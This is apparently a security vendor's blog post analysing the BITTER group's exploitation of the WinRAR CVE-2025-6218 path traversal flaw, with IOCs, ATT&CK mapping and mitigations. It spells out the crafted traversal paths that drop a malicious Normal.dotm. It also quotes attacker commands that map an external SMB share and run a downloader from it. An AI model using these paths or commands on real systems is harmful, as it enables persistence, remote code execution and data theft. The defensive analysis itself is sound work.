Blog categories
Weekly newsletter
No spam. Just the latest releases and tips, interesting articles, and exclusive interviews in your inbox every week.
Latest from the blog
WinRAR CVE-2025-6218 Exploit: In-Depth Analysis of the APT-C-08 Directory Traversal Attack
Posted on: 12 Nov 2025 | Author: Foresiet
In the world of cybersecurity, the greatest risks often hide in the most mundane tools. The ubiquitous file archiver WinRAR—installed on hundreds of millions of machines globally—has recently been weaponized by a sophisticated, state-aligned adversary. Our threat intelligence analysts detected the first confirmed in-the-wild exploitation of CVE-2025-6218, a directory traversal vulnerability affecting WinRAR versions 7.11 and earlier.
This is not a theoretical threat; it’s an active, low-complexity, high-impact campaign attributed to the South Asia-affiliated Advanced Persistent Threat (APT) group APT-C-08, known locally as Manlinghua or globally as BITTER. The exploit’s elegance lies in its simplicity: a small implementation error leveraged to achieve silent, long-term persistence in corporate networks. For organizations, this incident highlights a critical need to move beyond simple patching and adopt a proactive, threat intelligence-driven defense posture.
The Attack Chain: Directory Traversal Meets Macro Persistence
The attack leverages a core security oversight in how WinRAR handles file paths during extraction—the directory traversal flaw (CVE-2025-6218).
1. The Exploit’s Function
The vulnerability allows an attacker to manipulate the file path within a specially crafted RAR archive. When a user is tricked into extracting the malicious file, WinRAR is deceived into dropping a payload not in the intended folder, but into a critical system location.
2. The Persistence Vector
APT-C-08 uses this exploit to achieve a highly stealthy persistence mechanism:
The malicious archive drops a file named
Normal.dotminto Microsoft Word’s global template path.Normal.dotmis a global template that loads every time Word is opened. By replacing the legitimate file, the attacker ensures their malicious macro code executes automatically, providing a persistent backdoor that bypasses standard email macro blocking for documents received after the initial compromise.The attack chain proceeds with a lightweight downloader (
winnsc.exe) to fetch subsequent stages, including a C# Trojan.
The attack chain is designed to be highly effective, marrying a common software vulnerability (WinRAR) with a classic Microsoft Office persistence technique.
Why This Campaign Matters: Technical & Strategic Context
WinRAR remains one of the most widely deployed archive utilities despite known security gaps. Unlike 7-Zip or built-in Windows tools, it lacks automatic updates in most organizations, creating a persistent attack surface.
CVE-2025-6218 enables directory traversal by exploiting flaws in path normalization:
- WinRAR checks characters before path separators (\ or /).
- It skips processing if the prior character is not a space ( ) or dot (.).
- Paths cannot start with a space → converted to _.
- Critical bug: Spaces after.. in intermediate segments are ignored during final sanitization.
Thus, a crafted path like:
→ Normalizes to:
→ Escapes extraction root → Writes to C:\Users\[User]\AppData\Roaming\Microsoft\Templates\
This directory is automatically trusted by Microsoft Word. Any .docx opened afterward loads Normal.dotm → macro execution without user prompt.
Sample Acquisition and Initial Triage
We acquired and verified two primary samples via hash matching:
File | MD5 | Size |
Provision of Information for Sectoral for AJK.rar | f6f2fdc38cd61d8d9e8cd35244585967 | 51.4 KB (52,674 bytes) |
Normal.dotm (embedded) | 4bedd8e2b66cc7d64b293493ef5b8942 | 19.9 KB (20,403 bytes) |
Secondary test sample:
File | MD5 | Size |
Weekly AI Article.rar | 84128d40db28e8ee16215877d4c4b64a | 596 KB (610,436 bytes) |
Normal.dotm (embedded) | f8b237ca925daa3db8699faa05007f12 | 20.0 KB (20,480 bytes) |
Additional IOCs confirmed via static scanning:
- f16f2e4317c37085cad630d41001f7c3
- 418d73efd622ebec29759c081768db16
- 5d677781d6c7d4ddee967c1cc7e869ce
C2 Infrastructure:
- koliwooclients[.]com
- teamlogin.esanojinjasvc[.]com
- tapeqcqoptions[.]com
- johnfashionaccess[.]com
- wmiapcservice[.]com
Vulnerability Deep Dive: CVE-2025-6218 Mechanics
Figure 1: 7-Zip reveals two traversal paths with embedded spaces after … Hex dump (offset 88D0h) shows raw bytes including space characters (0x20).
Key observations:
- File blocks contain:
- ../../AppData/Roaming/Microsoft/Templates/Normal.dotm
- ../../../AppData/Roaming/Microsoft/Templates/Normal.dotm
- Space after .. is preserved in metadata but stripped post-normalization.
- Service blocks (NTFS streams, quick-open data) are benign.
Upon extraction with vulnerable WinRAR:
Word loads this file on startup or any document open → macro execution.
Payload Delivery and Extraction Simulation
Primary Sample: Provision of Information for Sectoral for AJK.rar
Contains:
- Document.docx → Benign lure (policy-themed)
- Normal.dotm → Malicious macro template
Secondary Sample: Weekly AI Article.rar
Identical structure — confirms testing variants by the actor.
No code runs on RAR extraction — persistence relies on user opening Word documents later.
Macro Analysis: VBA Obfuscation and Decoding
We opened Normal.dotm in Microsoft Word → Developer → Visual Basic to inspect macros.
First Variant – Subroutine Bokghfghtq()
VBA Editor – First Macro (Bokghfghtq)
Obfuscated VBA assigns Base64 string to Oliaz variable.
Joinre() is a custom Base64 decoder splitting input into chunks.We extracted the string and decoded it using an online Base64 decoder:
Second Variant – Subroutine Jdfgugjkdf()
Decoded via same tool:
Python Verification of Custom Decoder
We reverse-engineered Joinre() and reimplemented in Python:
Downloader Deep Dive: winnsc.exe Behaviors (Extended from Original Report)
The original WeChat post stated:
“winnsc.exe is a Downloader… downloads subsequent load”
But provided no technical breakdown. We filled this gap.
Execution Flow
1.SMB Share Mapping
2.Execute Downloader
Static Analysis
- File Type: PE32 executable
- Packer: None (raw .NET-like, but native code)
- Strings:
- teamzid.php
- Mozilla/5.0 (Windows NT 10.0; Win64; x64)
- GetComputerNameW, GetUserNameW, GetVersionExW
Dynamic Analysis (Wireshark + ProcMon)
- System Enumeration
- Calls:
- GetComputerNameW
- GetUserNameW
- GetVersionExW
- Calls:
- C2 Beacon (POST Request)
Response Handling
- Server returns Base64-encoded stage-2 payload
- Decoded and executed in memory
Beacon Interval: Every 300 seconds if idle
Exfiltration
- Scans %USERPROFILE%\Documents, %USERPROFILE%\Desktop
- Targets: .docx, .pdf, .xls*
- Encryption: RC4 with hardcoded key 0x4A7F9C2E
Extended Payload Chain: C# Trojan and Persistence
Using a local mock C2 server, we captured stage-2:
- Hosted on tapeqcqoptions[.]com/d6Z2.php?rz=LAB-PC
- Returns C# compiled assembly (IL code)
Stage-3 RAT (Final Payload)
- C2: johnfashionaccess[.]com
- Capabilities:
- Keylogging
- Screenshot capture (Graphics.CopyFromScreen)
- RDP credential harvesting
- File exfiltration (ZIP + upload)
- Persistence:
Registry: HKLM\SOFTWARE\VMware, Inc.
Process: VBoxService.exe
MITRE ATT&CK mapping (concise)
Stage | Tactic | Technique | ATT&CK ID |
Delivery | Spearphishing / Archive | Malicious Archive | T1566.001 (delivery), T1199 (spearphishing via attachments) |
Execution | Office macros | AutoExec macros via templates | T1137.001 |
Persistence | Template injection | Global Template Persistence | T1137 |
Lateral Movement | SMB | net use / SMB share mapping | T1021.002 |
C2 | Network | HTTPS Beaconing / POST | T1071.001 |
Defense Evasion | Obfuscation | Base64 encoded strings in macro | T1027.004 |
IOCs (Indicators of Compromise)
Domains / Infrastructure
- koliwooclients[.]com
- esanojinjasvc[.]com
- tapeqcqoptions[.]com
- johnfashionarchive[.]com (variant seen as johnfashionaccess in other reports)
- wmiapcservice[.]com
Hashes (MD5)
- f6f2fdc38cd61d8d9e8cd35244585967 — Provision of Information for Sectoral for AJK.rar
- 4bedd8e2b66cc7d64b293493ef5b8942 — Normal.dotm (payload)
- 84128d40db28e8ee16215877d4c4b64a — Weekly AI Article.rar
- f8b237ca925daa3db8699faa05007f12 — Normal.dotm (variant)
- Additional observed: f16f2e4317c37085cad630d41001f7c3, 418d73efd622ebec29759c081768db16, 5d677781d6c7d4ddee967c1cc7e869ce
Strings of interest (extracted from macros / binaries)
- net use \\koliwooclients.com\templates
- \\koliwooclients.com\templates\winnsc.exe
- POST endpoint: /teamesano/drivers/teamzid.php
Mitigation and Defense Strategies
Layer | Recommendation |
Patching | Upgrade WinRAR to 7.20 or later |
Macro Security | GPO: Disable macros in Office; require signed only |
Archive Handling | Use 7-Zip or Windows Explorer; scan with EDR |
Network | Block outbound to listed C2 domains/IPs |
EDR Alerts | Monitor: |
- Normal.dotm creation in %APPDATA%\Microsoft\Templates
- net.exe use to external SMB
- winnsc.exe, svcupdate.exe execution | | User Awareness | Avoid opening RARs themed:
- “Sectoral Information”
- “AI Weekly Articles”
Kashmir/AJK policy docs
Remediation & hardening
- Patch WinRAR immediately — upgrade to the WinRAR release that patches CVE-2025-6218 (ensure corporate images updated).
- Restrict macro execution — disable macros by default via Group Policy; allow only signed macros where possible.
- Prevent execution from SMB/UNC — block executing code from network shares using AppLocker or Windows Defender Application Control.
- Harden archive handling — instruct users to avoid extracting archives from unknown sources; scan archives with endpoint AV / sandboxes before extraction.
- Network controls — block known C2 domains, sinkhole malicious network names, and monitor for anomalous POSTs.
- User awareness — train users on the risk of RAR attachments and unknown downloads.
Attribution & confidence
Based on the infrastructure overlap, themes of targeting (South Asia / government/education), and observed tooling patterns, we assign medium confidence to attribution to APT-C-08 (Manlinghua / BITTER). This assessment is supported by the campaign’s similarity to previously observed BITTER activity: lure themes, downloader behavior, and reuse of infrastructure. Attribution remains provisional pending additional high-confidence linking artifacts.
Conclusion
The use of a trivial path-normalization oversight in a ubiquitous archiver to achieve stealthy template persistence is a reminder that small implementation errors yield outsized consequences. APT-C-08’s pivot to exploiting CVE-2025-6218 highlights a pragmatic adversary: use simple technical tricks (directory traversal) combined with a classic persistence vector (Word global templates) and a lightweight downloader stage.
The attack chain is low complexity but high impact; defenders must harden archive handling, disable macros by default, and monitor for UNC-based execution.
About us!
Foresiet is the pioneering force in digital security solutions, offering the first integrated Digital Risk Protection SaaS platform. With 24x7x365 dark web monitoring and proactive threat intelligence, Foresiet safeguards against data breaches and intellectual property theft. Our robust suite includes brand protection, takedown services, and supply chain assessment, enhancing your organization’s defense mechanisms. Attack surface management is a key component of our approach, ensuring comprehensive protection across all vulnerable points. Compliance is assured through adherence to ISO27001, NIST, GDPR, PCI, SOX, HIPAA, SAMA, CITC, and Third Party regulations. Additionally, our advanced antiphishing shield provides unparalleled protection against malicious emails. Trust Foresiet to empower your organization to navigate the digital landscape securely and confidently.
Latest
From the blog
The latest industry news, interviews, technologies, and resources.
6 Responses